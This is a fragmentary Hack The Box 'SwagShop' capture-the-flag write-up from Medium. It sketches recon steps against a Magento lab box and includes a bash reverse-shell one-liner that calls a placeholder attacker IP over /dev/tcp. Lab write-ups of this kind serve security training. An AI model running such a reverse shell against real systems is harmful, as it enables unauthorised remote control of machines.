Hack The Box — SwagShop

Nmap Scan

  1. Try to check the source code for any credential leakage
  2. Try to brute-force the directories for the same purpose
  3. Try to search for public exploits for Magento
  1. Source code enumeration
http://10.10.10.140/index.php/admin
'bash -c "bash -i >& /dev/tcp/your-ip/port 0>&1"'

Congrats ❤

Stay in touch

Offensive Security Enthusiast — twitter @eslam3kll

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Apple has fixed a major macOS issue

{UPDATE} Cat Football Arena Hack Free Resources Generator

Password Manager or Expanded Password System

What Impact Does Artificial Intelligence Have on Network Security?

{UPDATE} Fill In 3D Hack Free Resources Generator

You can run but you can’t hide

Attack Surface and Defence Surface Visually Explained

𝗕𝗥𝗧𝗥 𝗟𝗜𝗦𝗧𝗜𝗡𝗚 𝗔𝗡𝗡𝗢𝗨𝗡𝗖𝗘𝗠𝗘𝗡𝗧

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Eslam Akl

Eslam Akl

Offensive Security Enthusiast — twitter @eslam3kll

More from Medium

Forge — HTB

Ffuf TryHackMe Part-2

Creating easy proof-of-concept scripts with Python and Curl.

HackTheBox Writeup — Intelligence